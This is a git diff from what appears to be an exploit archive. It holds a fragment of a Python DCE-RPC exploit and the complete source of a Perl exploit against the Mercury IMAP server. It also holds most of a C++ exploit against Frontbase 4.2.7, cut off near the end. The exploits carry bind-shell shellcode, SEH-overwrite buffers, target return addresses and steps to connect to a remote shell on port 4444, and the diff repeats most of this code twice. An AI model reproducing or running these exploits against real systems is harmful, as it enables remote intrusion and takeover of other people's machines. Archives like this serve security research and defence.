"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x56" +shellcode += "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f" +shellcode += "\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d" +shellcode += "\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x4f\x4f\x48\x4d" +shellcode += 
"\x4f\x4f\x42\x4d\x5a\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" + +def DCEconnectAndExploit(target): + trans = transport.TCPTransport(target, 6503) + trans.connect() + dce = dcerpc.DCERPC_v5(trans) + dce.bind(uuid.uuidtup_to_bin(('dc246bf0-7a7a-11ce-9f88-00805fe43838', '1.0'))) + + # The following DWORD gets converted to an address pointing into our + # buffer. + request = struct.pack('\n' % sys.argv[0] + sys.exit(-1) + + DCEconnectAndExploit(target) + print 'Exploit sent to: %s' % target + print 'Connecting to %s:4444' % target + time.sleep(3) + ConnectRemoteShell(target) + +# milw0rm.com [2007-03-16] diff --git a/platforms/windows/remote/3561.pl b/platforms/windows/remote/3561.pl index 0ff6ab7f8..1e22b135f 100755 --- a/platforms/windows/remote/3561.pl +++ b/platforms/windows/remote/3561.pl 
@@ -1,117 +1,117 @@
-#!/usr/bin/perl
-#
-# http://www.securityfocus.com/bid/11775
-# credit to Muts for this vulnerability
-# acaro [at] jervus.it
-
-
-use IO::Socket::INET;
-use Switch;
-
-if (@ARGV < 3) {
-print "--------------------------------------------------------------------\n";
-print "Usage : mercury-4444-multi.pl -hTargetIPAddress -oAssemblyinstructions\n";
-print " Return address: \n";
-print " 1 - Windows 2k Sp4 English Version\n";
-print " 2 - Windows 2k Sp4 Italian Version\n";
-print " 3 - Windows XP Sp1 English Version\n";
-print " 4 - Windows XP Sp0 English Version\n";
-print " If values not specified, Windows 2k Sp4 will be used.\n";
-print " Example : ./mercury-4444-multi.pl -h127.0.0.1 -o1 -o1\n";
-print "--------------------------------------------------------------------\n";
-}
-
-use IO::Socket::INET;
-
-my $host = 10.0.0.2;
-my $port = 143;
-my $reply;
-my $request;
-my $jmp="\xe9\x02\xff\xff\xff";
-
-my $nextseh = "\x90\x90\xeb\x09";
-
-
-
-#A binary translation of NGS Writing Small Shellcode by Dafydd Stuttard with only two little differences
-#1)bind port, in this exploit is 4444 in the original shellcode was 6666
-#2)4 bytes added to the shellcode in order not to see the window of cmd.exe on remote host
-my $shellcode =
-"\x59\x81\xc9\xd3\x62\x30\x20\x41\x43\x4d\x64".
-"\x64\x99\x96\x8D\x7E\xE8\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B\x49\x1C".
-"\x8B\x09\x8B\x69\x08\xB6\x03\x2B\xE2\x66\xBA\x33\x32\x52\x68\x77".
-"\x73\x32\x5F\x54\xAC\x3C\xD3\x75\x06\x95\xFF\x57\xF4\x95\x57\x60".
-"\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF".
-"\x47\x8B\x34\xBB\x03\xF5\x99\xAC\x34\x71\x2A\xD0\x3C\x71\x75\xF7".
-"\x3A\x54\x24\x1C\x75\xEA\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B".
-"\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3B\xF7\x75\xB4".
-"\x5E\x54\x6A\x02\xAD\xFF\xD0\x88\x46\x13\x8D\x48\x30\x8B\xFC\xF3".
-"\xAB\x40\x50\x40\x50\xAD\xFF\xD0\x95\xB8\x02\xFF\x11\x5c\x32\xE4".
-"\x50\x54\x55\xAD\xFF\xD0\x85\xC0\x74\xF8\xFE\x44\x24\x2D\xFE\x44".
-"\x24\x2c\x83\xEF\x6C\xAB\xAB\xAB\x58\x54\x54\x50\x50\x50\x54\x50".
-"\x50\x56\x50\xFF\x56\xE4\xFF\x56\xE8";
-
-
-
-
-
-
-foreach (@ARGV) {
-$host = $1 if ($_=~/-h((.*)\.(.*)\.(.*)\.(.*))/);
-$seh = $1 if ($_=~/-o(.*)/);
-$happy = $1 if ($_=~/-o(.*)/);
-}
-
-switch ($seh) {
-case 1 { $seh="\x43\x8f\x2d\x7c" } # Win2k SP4 English version jmp ebx in advapi32.dll
-case 2 { $seh="\x43\x8f\x26\x79" } # Win2k SP4 Italian version jmp ebx in advapi32.dll
-case 3 { $seh="\xc0\x5f\x3c\x76" } # WinXP Pro English SP1 version pop ecx pop ecx ret in comdlg32.dll
-case 4 { $seh="\xfc\x61\x3c\x76" } # WinXP Pro English SP0 version pop ecx pop ecx ret in comdlg32.dll
-}
-
-
-switch ($happy) {
-case 1 { $happy="\x8d\x83\x34\xff\xff\xff\x50\xc3" } # Win2k SP4 English version
-case 2 { $happy="\x8d\x83\x34\xff\xff\xff\x50\xc3" } # Win2k SP4 Italian version
-case 3 { $happy="\x8b\xc1\x66\x05\x34\x29\x50\xc3" } # WinXP Pro English SP1 version
-case 4 { $happy="\x8b\xc1\x66\x05\x34\x29\x50\xc3" } # WinXP Pro English SP0 version
-}
-
-my $request ="1 LOGIN".(" "x948)."\{255\}\n";
-
-
-
-my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
-$socket or die "Cannot connect to host!\n";
-
-recv($socket, $reply, 1024, 0);
-print "Response:" . $reply;
-
-send $socket, $request, 0;
-print "[+] Sent 1st request\n";
-recv($socket, $reply, 1024, 0);
-print "Response:" . 
$reply;
-sleep(1);
-
-
-
-my $request ="\x41" x 255;
-
-send $socket, $request, 0;
-print "[+] Sent 2nd request\n";
-sleep(1);
-
-my $request=("\x45" x7420).("\x90" x10).$happy.("\x90" x14).$shellcode.("\x41" x8).$nextseh.$seh.("\x90" x5).$jmp.("\x90" x533);
-
-send $socket, $request, 0;
-print "[+] Sent final request\n";
-sleep(1);
-
-close($socket);
-
-print " + connect on port 4444 of $host ...\n";
-sleep(3);
-system("telnet $host 4444");
-exit;
-
-# milw0rm.com [2007-03-24]
+#!/usr/bin/perl
+#
+# http://www.securityfocus.com/bid/11775
+# credit to Muts for this vulnerability
+# acaro [at] jervus.it
+
+
+use IO::Socket::INET;
+use Switch;
+
+if (@ARGV < 3) {
+print "--------------------------------------------------------------------\n";
+print "Usage : mercury-4444-multi.pl -hTargetIPAddress -oAssemblyinstructions\n";
+print " Return address: \n";
+print " 1 - Windows 2k Sp4 English Version\n";
+print " 2 - Windows 2k Sp4 Italian Version\n";
+print " 3 - Windows XP Sp1 English Version\n";
+print " 4 - Windows XP Sp0 English Version\n";
+print " If values not specified, Windows 2k Sp4 will be used.\n";
+print " Example : ./mercury-4444-multi.pl -h127.0.0.1 -o1 -o1\n";
+print "--------------------------------------------------------------------\n";
+}
+
+use IO::Socket::INET;
+
+my $host = 10.0.0.2;
+my $port = 143;
+my $reply;
+my $request;
+my $jmp="\xe9\x02\xff\xff\xff";
+
+my $nextseh = "\x90\x90\xeb\x09";
+
+
+
+#A binary translation of NGS Writing Small Shellcode by Dafydd Stuttard with only two little differences
+#1)bind port, in this exploit is 4444 in the original shellcode was 6666
+#2)4 bytes added to the shellcode in order not to see the window of cmd.exe on remote host
+my $shellcode =
+"\x59\x81\xc9\xd3\x62\x30\x20\x41\x43\x4d\x64".
+"\x64\x99\x96\x8D\x7E\xE8\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B\x49\x1C".
+"\x8B\x09\x8B\x69\x08\xB6\x03\x2B\xE2\x66\xBA\x33\x32\x52\x68\x77".
+"\x73\x32\x5F\x54\xAC\x3C\xD3\x75\x06\x95\xFF\x57\xF4\x95\x57\x60".
+"\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF".
+"\x47\x8B\x34\xBB\x03\xF5\x99\xAC\x34\x71\x2A\xD0\x3C\x71\x75\xF7".
+"\x3A\x54\x24\x1C\x75\xEA\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B".
+"\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3B\xF7\x75\xB4".
+"\x5E\x54\x6A\x02\xAD\xFF\xD0\x88\x46\x13\x8D\x48\x30\x8B\xFC\xF3".
+"\xAB\x40\x50\x40\x50\xAD\xFF\xD0\x95\xB8\x02\xFF\x11\x5c\x32\xE4".
+"\x50\x54\x55\xAD\xFF\xD0\x85\xC0\x74\xF8\xFE\x44\x24\x2D\xFE\x44".
+"\x24\x2c\x83\xEF\x6C\xAB\xAB\xAB\x58\x54\x54\x50\x50\x50\x54\x50".
+"\x50\x56\x50\xFF\x56\xE4\xFF\x56\xE8";
+
+
+
+
+
+
+foreach (@ARGV) {
+$host = $1 if ($_=~/-h((.*)\.(.*)\.(.*)\.(.*))/);
+$seh = $1 if ($_=~/-o(.*)/);
+$happy = $1 if ($_=~/-o(.*)/);
+}
+
+switch ($seh) {
+case 1 { $seh="\x43\x8f\x2d\x7c" } # Win2k SP4 English version jmp ebx in advapi32.dll
+case 2 { $seh="\x43\x8f\x26\x79" } # Win2k SP4 Italian version jmp ebx in advapi32.dll
+case 3 { $seh="\xc0\x5f\x3c\x76" } # WinXP Pro English SP1 version pop ecx pop ecx ret in comdlg32.dll
+case 4 { $seh="\xfc\x61\x3c\x76" } # WinXP Pro English SP0 version pop ecx pop ecx ret in comdlg32.dll
+}
+
+
+switch ($happy) {
+case 1 { $happy="\x8d\x83\x34\xff\xff\xff\x50\xc3" } # Win2k SP4 English version
+case 2 { $happy="\x8d\x83\x34\xff\xff\xff\x50\xc3" } # Win2k SP4 Italian version
+case 3 { $happy="\x8b\xc1\x66\x05\x34\x29\x50\xc3" } # WinXP Pro English SP1 version
+case 4 { $happy="\x8b\xc1\x66\x05\x34\x29\x50\xc3" } # WinXP Pro English SP0 version
+}
+
+my $request ="1 LOGIN".(" "x948)."\{255\}\n";
+
+
+
+my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
+$socket or die "Cannot connect to host!\n";
+
+recv($socket, $reply, 1024, 0);
+print "Response:" . $reply;
+
+send $socket, $request, 0;
+print "[+] Sent 1st request\n";
+recv($socket, $reply, 1024, 0);
+print "Response:" . 
$reply;
+sleep(1);
+
+
+
+my $request ="\x41" x 255;
+
+send $socket, $request, 0;
+print "[+] Sent 2nd request\n";
+sleep(1);
+
+my $request=("\x45" x7420).("\x90" x10).$happy.("\x90" x14).$shellcode.("\x41" x8).$nextseh.$seh.("\x90" x5).$jmp.("\x90" x533);
+
+send $socket, $request, 0;
+print "[+] Sent final request\n";
+sleep(1);
+
+close($socket);
+
+print " + connect on port 4444 of $host ...\n";
+sleep(3);
+system("telnet $host 4444");
+exit;
+
+# milw0rm.com [2007-03-24]
diff --git a/platforms/windows/remote/3575.cpp b/platforms/windows/remote/3575.cpp
index b146fef87..37f30c79d 100755
--- a/platforms/windows/remote/3575.cpp
+++ b/platforms/windows/remote/3575.cpp
@@ -1,529 +1,529 @@ -/* Dreatica-FXP crew -* -* ---------------------------------------- -* Target : Frontbase <= 4.2.7 for Windows -* Site : http://www.frontbase.com -* Found by : Netragard, L.L.C Advisory -* ---------------------------------------- -* Exploit date : 25.03.2007 -* Exploit writer : Heretic2 (heretic2x@gmail.com) -* OS : Windows 2000 SP4 (will add other later) -* Crew : Dreatica-FXP -* ---------------------------------------- -* Info: -* The last Windows version of Frontbase that you can found on official site www.frontbase.com -* is the 4.2.7d and this version is patched, so the exploit will not work here, i have tested that -* exploit on the 4.2.7 version under Windows 2000 SP4 (not patched) and it is working good. -* -* The exploitation, as said in advisory, of this bug is easy: SEH and EIP overwrite methods. -* but in 'real' life the exploitation is more difficult, cause the server allows only alphanumeric -* bytes, like: 0x01 0x02 ... 0x7e 0x7f . -* other bytes: 0x80 ... 0xff come to server transformed: -* 0xEB will transform in two bytes 0xC2 0xAB -* 0xFF will transform in two bytes 0xC3 0xBF -* and etc... -* -* so the exploitation become more difficult here, however in one place of buffer i send to the server byte -* 0xff, with assumptions that i will get the bytes 0xC3 0xBF and that the buffer will be one byte longer. -* -* for the correct exploitation i used some code from win32 SEH GetPC project and metasploit for the shellcodes. -* -* so the exploit is: -* send 3115 bytes to server + address to overwrite SEH. -* in my case i sent 3114 bytes, cause one 0xff transformed in 2 symbols -* -* ---------------------------------------- -* Compiling: -* To compile this exploit you need: -* 1. C:\usr\FrontBase\Include\FBCAccess copy to exploit folder. -* 2. Copy from C:\usr\FrontBase\lib\ file FBCAccess.lib to your exploit folder. -* 3. Select FBCAccess.lib in linker options -* 4. Compile. 
-* ---------------------------------------- -* Thanks to: -* Netragard, L.L.C Advisory ( http://www.netragard.com -- "We make I.T. Safe." ) -* The Metasploit project ( http://metasploit.com ) -* win32 SEH GetPC project ( ) -* Dreatica-FXP crew ( ) -* ---------------------------------------- -* -*/ - -#include -#include -#include -#include -#pragma comment(lib,"ws2_32") -#include "FBCAccess/FBCAccess.h" - -void usage(char * s); -void logo(); -void prepare_shellcode(unsigned char * fsh, int sh); -void make_buffer(char * buf, int itarget, int sh); -int validate_args( int port, int sh, int itarget); -int send_buffer(char * host, int port, char * user, char * password, char * dbpassword, char * database, char * buf); - -// ----------------------------------------------------------------- -// XGetopt.cpp Version 1.2 -// ----------------------------------------------------------------- -int getopt(int argc, char *argv[], char *optstring); -char *optarg; // global argument pointer -int optind = 0, opterr; // global argv index -// ----------------------------------------------------------------- -// ----------------------------------------------------------------- - -struct { - const char *t ; - unsigned long ret ; -} targets[]= - { - // we need alphanumeric addreses so this one found in MSVCRT.dll (there are a lot in it) - {"Windows 2000 SP4 no patches, MSVCRT.dll", 0x78014c40 },//pop, pop, ret - {"Windows 2000 SP4 no pathces, MSVCRT.dll", 0x7803382b },//jmp ebx - {NULL, 0x00000000 } - }; - -struct { - const char * name; - char * shellcode; -}shellcodes[]={ - {"Spawn bindshell on port 4444", - /* modified win32_bind - EXITFUNC=seh LPORT=4444 Encoder=Alpha2 http://metasploit.com - first jmp instructions replaced by alphanumeric code taken from the win32 SEH GetPC project. 
*/ - "\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48\x50\x68" - "\x59\x41\x41\x51\x68\x5A\x59\x59\x59\x59\x41\x41\x51\x51\x44\x44" - "\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58\x56\x6A\x30\x50\x50\x54" - "\x55\x50\x50\x61\x33\x30\x31\x30\x38\x39\x49\x49\x49\x49\x49\x49" - "\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x66" - "\x58\x30\x42\x31\x50\x41\x42\x6b\x42\x41\x76\x32\x42\x42\x32\x41" - "\x41\x30\x41\x41\x42\x58\x50\x38\x42\x42\x75\x38\x69\x39\x6c\x52" - "\x4a\x5a\x4b\x42\x6d\x68\x68\x48\x79\x4b\x4f\x6b\x4f\x4b\x4f\x65" - "\x30\x6c\x4b\x30\x6c\x31\x34\x71\x34\x4e\x6b\x42\x65\x65\x6c\x6e" - "\x6b\x53\x4c\x43\x35\x62\x58\x55\x51\x4a\x4f\x4e\x6b\x72\x6f\x54" - "\x58\x6c\x4b\x51\x4f\x77\x50\x53\x31\x78\x6b\x43\x79\x4e\x6b\x54" - "\x74\x6c\x4b\x35\x51\x6a\x4e\x64\x71\x6f\x30\x6e\x79\x6e\x4c\x6d" - "\x54\x6f\x30\x64\x34\x55\x57\x4f\x31\x59\x5a\x36\x6d\x36\x61\x59" - "\x52\x5a\x4b\x4c\x34\x37\x4b\x62\x74\x47\x54\x46\x48\x70\x75\x4d" - "\x35\x6c\x4b\x73\x6f\x64\x64\x33\x31\x4a\x4b\x43\x56\x4c\x4b\x44" - "\x4c\x62\x6b\x6e\x6b\x63\x6f\x57\x6c\x65\x51\x6a\x4b\x77\x73\x56" - "\x4c\x6c\x4b\x6e\x69\x62\x4c\x44\x64\x45\x4c\x55\x31\x6f\x33\x44" - "\x71\x6b\x6b\x51\x74\x4e\x6b\x53\x73\x30\x30\x4e\x6b\x57\x30\x34" - "\x4c\x6c\x4b\x64\x30\x37\x6c\x4e\x4d\x6c\x4b\x53\x70\x73\x38\x73" - "\x6e\x30\x68\x4c\x4e\x62\x6e\x74\x4e\x38\x6c\x30\x50\x79\x6f\x6a" - "\x76\x51\x76\x30\x53\x42\x46\x72\x48\x35\x63\x45\x62\x33\x58\x64" - "\x37\x64\x33\x74\x72\x43\x6f\x33\x64\x4b\x4f\x78\x50\x52\x48\x38" - "\x4b\x7a\x4d\x4b\x4c\x57\x4b\x62\x70\x69\x6f\x6e\x36\x71\x4f\x6e" - "\x69\x4b\x55\x33\x56\x6c\x41\x4a\x4d\x76\x68\x74\x42\x63\x65\x51" - "\x7a\x77\x72\x4b\x4f\x4a\x70\x63\x58\x6e\x39\x35\x59\x6b\x45\x4e" - "\x4d\x30\x57\x4b\x4f\x38\x56\x50\x53\x50\x53\x42\x73\x51\x43\x70" - "\x53\x70\x43\x32\x73\x52\x63\x76\x33\x59\x6f\x6e\x30\x55\x36\x33" - "\x58\x76\x71\x71\x4c\x63\x56\x56\x33\x6e\x69\x59\x71\x4e\x75\x55" - 
"\x38\x4c\x64\x55\x4a\x72\x50\x6b\x77\x56\x37\x4b\x4f\x4e\x36\x53" - "\x5a\x56\x70\x32\x71\x33\x65\x69\x6f\x4e\x30\x62\x48\x39\x34\x4c" - "\x6d\x74\x6e\x4a\x49\x63\x67\x69\x6f\x79\x46\x43\x63\x36\x35\x6b" - "\x4f\x68\x50\x35\x38\x5a\x45\x70\x49\x6d\x56\x70\x49\x41\x47\x6b" - "\x4f\x68\x56\x56\x30\x41\x44\x33\x64\x71\x45\x69\x6f\x4e\x30\x4d" - "\x43\x53\x58\x5a\x47\x70\x79\x6b\x76\x73\x49\x41\x47\x49\x6f\x4e" - "\x36\x63\x65\x4b\x4f\x4e\x30\x53\x56\x50\x6a\x35\x34\x53\x56\x41" - "\x78\x61\x73\x30\x6d\x4c\x49\x4b\x55\x72\x4a\x72\x70\x76\x39\x45" - "\x79\x58\x4c\x6b\x39\x59\x77\x31\x7a\x67\x34\x4c\x49\x49\x72\x70" - "\x31\x6f\x30\x6c\x33\x6f\x5a\x69\x6e\x72\x62\x36\x4d\x4b\x4e\x53" - "\x72\x34\x6c\x6a\x33\x6e\x6d\x62\x5a\x36\x58\x6c\x6b\x4c\x6b\x4e" - "\x4b\x61\x78\x30\x72\x6b\x4e\x6d\x63\x46\x76\x4b\x4f\x44\x35\x32" - "\x64\x39\x6f\x38\x56\x51\x4b\x70\x57\x52\x72\x70\x51\x32\x71\x53" - "\x61\x42\x4a\x43\x31\x56\x31\x46\x31\x70\x55\x43\x61\x79\x6f\x6a" - "\x70\x62\x48\x6e\x4d\x59\x49\x67\x75\x7a\x6e\x33\x63\x39\x6f\x59" - "\x46\x63\x5a\x59\x6f\x4b\x4f\x76\x57\x6b\x4f\x6a\x70\x4c\x4b\x61" - "\x47\x59\x6c\x6b\x33\x38\x44\x43\x54\x49\x6f\x58\x56\x36\x32\x59" - "\x6f\x4e\x30\x43\x58\x68\x70\x4f\x7a\x54\x44\x73\x6f\x71\x43\x4b" - "\x4f\x4e\x36\x6b\x4f\x78\x50\x66" - }, - {NULL , NULL } -}; - -// alphanumeric long back jump, using SEH method! 
-char jmptoshellcode[]= - // at the time of jump we have in EBX the address where we jumped after SEH exploitation - // so we can use it to jump [EBX-0C20] - "\x56\x54\x58\x36\x33\x30\x56\x58\x50\x50\x5f\x53\x58\x66\x2d\x20" - "\x0C\x50\x59\x58\x64\x33\x3f\x64\x31\x38\x51\x57\x64\x31\x20\x6c"; - - -int main(int argc, char **argv) -{ - char temp1[100], temp2[100]; - char * remotehost=NULL, * user=NULL, * password=NULL, * database=NULL, * dbpassword=NULL; - char default_remotehost[]="127.0.0.1"; - char default_user[]="_SYSTEM"; - char default_password[]=""; - char default_database[]=""; - char default_dbpassword[]=""; - int port, itarget, sh; - char c; - logo(); - if(argc<2) - { - usage(argv[0]); - return -1; - } - // set defaults - port=-1; - itarget=0; - sh=0; - // ------------ - while((c = getopt(argc, argv, "h:p:s:t:u:P:d:D:"))!= EOF) - { - switch (c) - { - case 'h': - remotehost=optarg; - break; - case 's': - sscanf(optarg, "%d", &sh); - sh--; - break; - case 't': - sscanf(optarg, "%d", &itarget); - itarget--; - break; - case 'p': - sscanf(optarg, "%d", &port); - break; - case 'u': - user=optarg; - break; - case 'P': - password=optarg; - break; - case 'd': - database=optarg; - break; - default: - usage(argv[0]); - return -1; - } - } - if(validate_args( port, sh, itarget)==-1) return -1; - if(remotehost == NULL) remotehost=default_remotehost; - if(user == NULL) user=default_user; - if(password == NULL) password=default_password; - if(dbpassword == NULL) dbpassword=default_dbpassword; - if(database == NULL) database=default_database; - - memset(temp1,0,sizeof(temp1)); - memset(temp2,0,sizeof(temp2)); - memset(temp1, '\x20' , 58 - strlen(remotehost) -1); - printf(" # Host : %s%s# \n", remotehost, temp1); - if(port!=-1) - { - sprintf(temp2, "%d", port); - memset(temp1,0,sizeof(temp1)); - memset(temp1, '\x20' , 58 - strlen(temp2) -1); - printf(" # Port : %s%s# \n", temp2, temp1); - }else - { - sprintf(temp2, "%s", database); - memset(temp1,0,sizeof(temp1)); - 
memset(temp1, '\x20' , 58 - strlen(temp2) -1); - printf(" # Database: %s%s# \n", temp2, temp1); - } - sprintf(temp2, "%s", user); - memset(temp1,0,sizeof(temp1)); - memset(temp1, '\x20' , 58 - strlen(temp2) -1); - printf(" # User : %s%s# \n", temp2, temp1); - sprintf(temp2, "%s", database); - memset(temp1,0,sizeof(temp1)); - memset(temp1, '\x20' , 58 - strlen(temp2) -1); - printf(" # Database: %s%s# \n", temp2, temp1); - memset(temp1,0,sizeof(temp1)); - memset(temp2,0,sizeof(temp2)); - sprintf(temp2, "%s", shellcodes[sh].name ); - memset(temp1, '\x20' , 58 - strlen(temp2) -1); - printf(" # Shellcde: %s%s# \n", temp2, temp1); - memset(temp1,0,sizeof(temp1)); - memset(temp1, '\x20' , 58 - strlen(targets[itarget].t) -1); - printf(" # Target : %s%s# \n", targets[itarget].t, temp1); - printf(" # ------------------------------------------------------------------- # \n"); - fflush(stdout); - - char buf[20000]; - memset(buf,0,sizeof(buf)); - printf("[+] Constructing attacking buffer... "); - fflush(stdout); - make_buffer((char *)buf,itarget,sh); - printf("done\n"); - - if(send_buffer(remotehost,port, user, password, dbpassword, database, buf)==-1) - { - fprintf(stdout, "[-] Cannot exploit server %s\n", remotehost); - return -1; - } - return 0; -} - -int validate_args(int port, int sh, int itarget) -{ - int i=0,x=0; - for(i=0;shellcodes[i].name;i++)if(i==sh)x=1; - if(x==0) - { - printf("[-] The shellcode number is invalid\n"); - return -1; - } - x=0; - for(i=0;targets[i].t;i++)if(i==itarget)x=1; - if(x==0) - { - printf("[-] The target is invalid\n"); - return -1; - } - return 1; -} - -void prepare_shellcode( char * fsh, int sh) -{ - memcpy(fsh, shellcodes[sh].shellcode, strlen(shellcodes[sh].shellcode)); -} - -void make_buffer(char * buf, int itarget, int sh) -{ - // -=[ prepare shellcode ]=- - char * fsh; - fsh = (char *) malloc ((strlen(shellcodes[sh].shellcode)+1) ); - memset(fsh, 0, (strlen(shellcodes[sh].shellcode)+1)); - prepare_shellcode(fsh, sh); - // 
----------------- - - // -=[ fill buffer here ]=- - memset(buf,0,sizeof(buf)); - char * cp = buf; - - // make vulnerable sql92 command to get exploit - strcat(buf, "create procedure \""); - cp=buf+strlen(buf); - - // some useless bytes - memset(cp, 'A', 7); - cp+=strlen((char *)cp); - - // shellcode - memcpy(cp, fsh, strlen(fsh)); - cp+=strlen((char *)cp); - - // fill after shellcode - memset(cp, 'A', 3045-strlen(fsh)); - cp+=strlen((char *)cp); - - // alphanumeric long jump to our shellcode at the start of the buffer - memcpy(cp, jmptoshellcode, strlen(jmptoshellcode)); - cp+=strlen((char *)cp); - memset(cp, 'A', 59-strlen(jmptoshellcode)); - cp+=strlen((char *)cp); - - // at this place in stack points EBX and RET will go here, so we need to jmp upper - // to prepare alphanumeric long jump - - *cp++ = '\x74'; // JNE ... at this point JNE will jump cause the last CMP was 'not equal' - *cp++ = '\xff'; // this is not alphanumeric , but the server will transform \xff -> \xC3\xBF - // so this will give us the JNE C3 and we will jump upper for 59 bytes - // where we put a longer jump to our shellcode. This will add one byte more - // so we will send not 3115, but 3114 bytes to overwrite SEH. 
- *cp++ = '\x41'; - - // SEH chain overwrite - *cp++ = (char)((targets[itarget].ret ) & 0xff); - *cp++ = (char)((targets[itarget].ret >> 8) & 0xff); - *cp++ = (char)((targets[itarget].ret >> 16) & 0xff); - *cp++ = (char)((targets[itarget].ret >> 24) & 0xff); - - // end of the sql92 command - memcpy(cp, "\"()\n begin\n end;", strlen("\"()\n begin\n end;")); - - // ----------------- -} - -int send_buffer(char * host, int port, char * user, char * password, char * dbpassword, char * database, char * buf) -{ - FBCDatabaseConnection * fbdc; - FBCMetaData *meta; - char sesn[]="dreatica-fxp"; - if(database!=NULL) port = -1; - fbcInitialize(); - if (port!=-1) - { - printf("[+] Connecting to %s:%d\n", host, port); - fbdc = fbcdcConnectToDatabaseUsingPort(host, port, dbpassword); - }else - { - printf("[+] Connecting to %s to database %s\n", host, database); - fbdc = fbcdcConnectToDatabase(database, host, dbpassword); - } - if (fbdc == NULL) - { - printf("[-] Cannot connect to %s\n", host); - return -1; - } - char * session_name=sesn; - meta = fbcdcCreateSession(fbdc, session_name, user, password, "system_user"); - if (fbcmdErrorsFound(meta) != 0) - { - printf("[-] Failed to create session\n"); - FBCErrorMetaData* emd = fbcdcErrorMetaData(fbdc, meta); - char* msgs = fbcemdAllErrorMessages(emd); - fbcemdRelease(emd); - free(msgs); - fbcmdRelease(meta); - fbcdcClose(fbdc); - fbcdcRelease(fbdc); - return -1; - } - fbcmdRelease(meta); - printf("[+] Sending %d bytes of buffer to server, check the shell\n", strlen(buf)); - // if exploit success, the app will stop here. 
- meta = fbcdcExecuteDirectSQL(fbdc, buf); - if (fbcmdErrorsFound(meta) != 0) - { - printf("[-] Failed to send buffer\n"); - FBCErrorMetaData* emd = fbcdcErrorMetaData(fbdc, meta); - char* msgs = fbcemdAllErrorMessages(emd); - fbcemdRelease(emd); - free(msgs); - fbcmdRelease(meta); - fbcdcClose(fbdc); - fbcdcRelease(fbdc); - return -1; - } - fbcmdRelease(meta); - return 1; -} - - -// ----------------------------------------------------------------- -// XGetopt.cpp Version 1.2 -// ----------------------------------------------------------------- -int getopt(int argc, char *argv[], char *optstring) -{ - static char *next = NULL; - if (optind == 0) - next = NULL; - - optarg = NULL; - - if (next == NULL || *next == '\0') - { - if (optind == 0) - optind++; - - if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '\0') - { - optarg = NULL; - if (optind < argc) - optarg = argv[optind]; - return EOF; - } - - if (strcmp(argv[optind], "--") == 0) - { - optind++; - optarg = NULL; - if (optind < argc) - optarg = argv[optind]; - return EOF; - } - - next = argv[optind]; - next++; // skip past - - optind++; - } - - char c = *next++; - char *cp = strchr(optstring, c); - - if (cp == NULL || c == ':') - return '?'; - - cp++; - if (*cp == ':') - { - if (*next != '\0') - { - optarg = next; - next = NULL; - } - else if (optind < argc) - { - optarg = argv[optind]; - optind++; - } - else - { - return '?'; - } - } - - return c; -} -// ----------------------------------------------------------------- -// ----------------------------------------------------------------- -// ----------------------------------------------------------------- - - - - - -void usage(char * s) -{ - printf(" Usage:\n"); - printf(" %s -h -p -s -t -u -p -d -D \n", s); - printf(" ----------------------------------------------------------------------- \n"); - printf(" Arguments:\n"); - printf("\n"); - printf(" -h the host IP to attack\n"); - printf(" -p the port of server (default: -1 )\n"); - printf(" -s 
shellcode number (default: 0 )\n"); - printf(" -t target number (default: 0 )\n"); - printf(" -t target number (default: 0 )\n"); - printf(" -u user name of frontbase (default: _SYSTEM)\n"); - printf(" -p user password (default: )\n"); - printf(" -d database (if port = -1) (default: )\n"); - printf(" -d database password (default: )\n"); - printf("\n"); - printf(" Shellcodes:\n"); - for(int i=0; shellcodes[i].name!=0;i++) - { - printf(" %d. %s Size=%d\n",i+1,shellcodes[i].name, strlen(shellcodes[i].shellcode)); - } - printf("\n"); - printf(" Targets:\n"); - for(int j=0; targets[j].t!=0;j++) - { - printf(" %d. %s\n",j+1,targets[j].t); - } - printf("\n"); - printf(" Examples:\n"); - printf(" %s -h 127.0.0.1 -d NewDB\n", s); - printf(" %s -h 127.0.0.1 -p 1155 -u root -p dta -D dta -t 1\n", s); - printf(" ----------------------------------------------------------------------- \n"); - - -} - -void logo() -{ - printf(" ####################################################################### \n"); - printf(" # ____ __ _ ______ __ _____ #\n"); - printf(" # / __ \\________ _____/ /_(_)_________ / __/\\ \\/ / / _ / #\n"); - printf(" # / / / / ___/ _ \\/ __ / __/ / ___/ __ / ___ / / \\ / / // / #\n"); - printf(" # / /_/ / / / ___/ /_// /_/ / /__/ /_// /__/ / _/ / \\ / ___/ #\n"); - printf(" # /_____/_/ \\___/ \\_,_/\\__/_/\\___/\\__,_/ /_/ /_/\\_\\/_/ #\n"); - printf(" # crew #\n"); - printf(" ####################################################################### \n"); - printf(" # Exploit : Frontbase <= 4.2.7 for Windows # \n"); - printf(" # Author : Heretic2 (heretic2x@gmail.com) # \n"); - printf(" # Version : 1.1 # \n"); - printf(" # System : Windows 2000 SP4 # \n"); - printf(" # Date : 25.03.2007 # \n"); - printf(" # ------------------------------------------------------------------- # \n"); -} - -// milw0rm.com [2007-03-25] +/* Dreatica-FXP crew +* +* ---------------------------------------- +* Target : Frontbase <= 4.2.7 for Windows +* Site : http://www.frontbase.com +* 
